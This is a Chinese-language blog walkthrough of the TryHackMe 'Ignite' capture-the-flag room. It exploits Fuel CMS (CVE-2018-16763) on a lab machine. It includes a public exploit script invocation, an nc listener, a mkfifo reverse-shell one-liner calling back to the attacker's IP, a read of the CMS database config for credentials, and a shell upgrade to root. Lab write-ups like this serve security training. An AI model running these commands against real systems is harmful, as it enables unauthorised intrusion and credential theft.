前言
房间地址:https://tryhackme.com/room/ignite
一家新成立的公司的网络服务器存在一些问题。
![图片[1],[Thm红队]Ignite-FUEL-CMS数据库泄露及CVE脚本利用,网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/01/20240105073150348.png?imageView2/0/format/webp/q/75)
![图片[2],[Thm红队]Ignite-FUEL-CMS数据库泄露及CVE脚本利用,网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/01/20240105072322548.png?imageView2/0/format/webp/q/75)
此次我将用Parror hack系统作为攻击机器
实战
靶机地址:10.10.178.214
先给咱的系统升一下root
![图片[3],[Thm红队]Ignite-FUEL-CMS数据库泄露及CVE脚本利用,网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/01/20240105073333172.png?imageView2/0/format/webp/q/75)
吐槽一下Thm的VPN 有点拉胯
![图片[4],[Thm红队]Ignite-FUEL-CMS数据库泄露及CVE脚本利用,网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/01/20240105073511369.png?imageView2/0/format/webp/q/75)
说明咱们连接不上他们的内网VPN
后来修了修,连上了好了我们开扫
![图片[5],[Thm红队]Ignite-FUEL-CMS数据库泄露及CVE脚本利用,网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/01/20240105081319512.png?imageView2/0/format/webp/q/75)
开放了80端口
![图片[6],[Thm红队]Ignite-FUEL-CMS数据库泄露及CVE脚本利用,网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/01/20240105081558428.png?imageView2/0/format/webp/q/75)
![图片[7],[Thm红队]Ignite-FUEL-CMS数据库泄露及CVE脚本利用,网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/01/20240105082242361.png?imageView2/0/format/webp/q/75)
查看源代码
![图片[8],[Thm红队]Ignite-FUEL-CMS数据库泄露及CVE脚本利用,网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/01/20240105082319945.png?imageView2/0/format/webp/q/75)
先登录上再说
![图片[9],[Thm红队]Ignite-FUEL-CMS数据库泄露及CVE脚本利用,网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/01/20240105083129272.png?imageView2/0/format/webp/q/75)
![图片[10],[Thm红队]Ignite-FUEL-CMS数据库泄露及CVE脚本利用,网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/01/20240105083342928.png?imageView2/0/format/webp/q/75)
可以看见直接文件上传漏洞 在上传之前我们先搜索一下Fuel CMS的漏洞
刚用Parror没有搜到Fuel CMS的漏洞 就用kali搜
![图片[11],[Thm红队]Ignite-FUEL-CMS数据库泄露及CVE脚本利用,网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/01/20240105083536712.png?imageView2/0/format/webp/q/75)
漏洞其实还不少… 不过在此使用他们的漏洞我觉得不如自己上传shell
![图片[12],[Thm红队]Ignite-FUEL-CMS数据库泄露及CVE脚本利用,网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/01/20240105083947869.png?imageView2/0/format/webp/q/75)
![图片[13],[Thm红队]Ignite-FUEL-CMS数据库泄露及CVE脚本利用,网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/01/20240105083856817.png?imageView2/0/format/webp/q/75)
这里看到我们准备的shell 是不行的 所以我们只能用漏洞库的脚本shell了
![图片[14],[Thm红队]Ignite-FUEL-CMS数据库泄露及CVE脚本利用,网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/01/20240105084051638.png?imageView2/0/format/webp/q/75)
这里看看他们的用法
![图片[15],[Thm红队]Ignite-FUEL-CMS数据库泄露及CVE脚本利用,网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/01/20240105134409113.png?imageView2/0/format/webp/q/75)
在这里试一下 不过我们还是去kali或者parror那里去运行脚本
这里我更换了一个靶机地址:因为老是断 服了
我一怒之下给我的kali和parror都上了”魔法”
![图片[16],[Thm红队]Ignite-FUEL-CMS数据库泄露及CVE脚本利用,网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/01/20240105133414624.png?imageView2/0/format/webp/q/75)
![图片[17],[Thm红队]Ignite-FUEL-CMS数据库泄露及CVE脚本利用,网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/01/20240105133439361.png?imageView2/0/format/webp/q/75)
我们继续:分析一下脚本的使用方法
![图片[18],[Thm红队]Ignite-FUEL-CMS数据库泄露及CVE脚本利用,网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/01/20240106051540237.png?imageView2/0/format/webp/q/75)
使用脚本:
python3 50477.py -u http://10.10.234.58
开启监听:
nc -nlvp 6666
反弹shell:
nc后面是自己的攻击地址
rm /tmp/f ; mkfifo /tmp/f ; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.2.92.117 6666 >/tmp/f
![图片[19],[Thm红队]Ignite-FUEL-CMS数据库泄露及CVE脚本利用,网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/01/20240106050225749.png?imageView2/0/format/webp/q/75)
不好意思这Thm靶场老断打一次靶场能断十几次 昨天因为这个老断我就没打,等我订阅结束之后就不打Thm打HTB了
先拿一个flag再说
![图片[20],[Thm红队]Ignite-FUEL-CMS数据库泄露及CVE脚本利用,网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/01/20240106051325321.png?imageView2/0/format/webp/q/75)
刚才连接又断了
不过再次连接上我们在看一下根目录
![图片[21],[Thm红队]Ignite-FUEL-CMS数据库泄露及CVE脚本利用,网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/01/20240106052100312.png?imageView2/0/format/webp/q/75)
根据开头的提示
![图片[22],[Thm红队]Ignite-FUEL-CMS数据库泄露及CVE脚本利用,网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/01/20240106052847670.png?imageView2/0/format/webp/q/75)
database中数据库泄露 当然这也是CVE-2018-16763的一个漏洞
没有对用户的查看权限进行过滤 这时候我们就可以查看他数据库
cat /var/www/html/fuel/application/config/database.php
![图片[23],[Thm红队]Ignite-FUEL-CMS数据库泄露及CVE脚本利用,网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/01/20240106053006214.png?imageView2/0/format/webp/q/75)
我们su root切换到root账户提示
![图片[24],[Thm红队]Ignite-FUEL-CMS数据库泄露及CVE脚本利用,网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/01/20240106053223292.png?imageView2/0/format/webp/q/75)
必须来自一个终端环境
那我们就创建,这个在我之前博客里面有讲解,加固shell创建终端环境
export TERM=xterm
python3 -c 'import pty;pty.spawn("/bin/bash")'
ctrl+z
stty raw -echo ; fg
reset
![图片[25],[Thm红队]Ignite-FUEL-CMS数据库泄露及CVE脚本利用,网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/01/20240106053351804.png?imageView2/0/format/webp/q/75)
回车 输入刚才数据库泄露的密码
![图片[26],[Thm红队]Ignite-FUEL-CMS数据库泄露及CVE脚本利用,网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/01/20240106053444521.png?imageView2/0/format/webp/q/75)
OK让拿root.txt
![图片[27],[Thm红队]Ignite-FUEL-CMS数据库泄露及CVE脚本利用,网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/01/20240106054346582.png?imageView2/0/format/webp/q/75)
![图片[28],[Thm红队]Ignite-FUEL-CMS数据库泄露及CVE脚本利用,网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/01/20240106053757552.png?imageView2/0/format/webp/q/75)
等订阅过期就打HTB了 本来能秒的 VPN一直断打不了一点,上代理都掉,这次大概断了十几次
暂无评论内容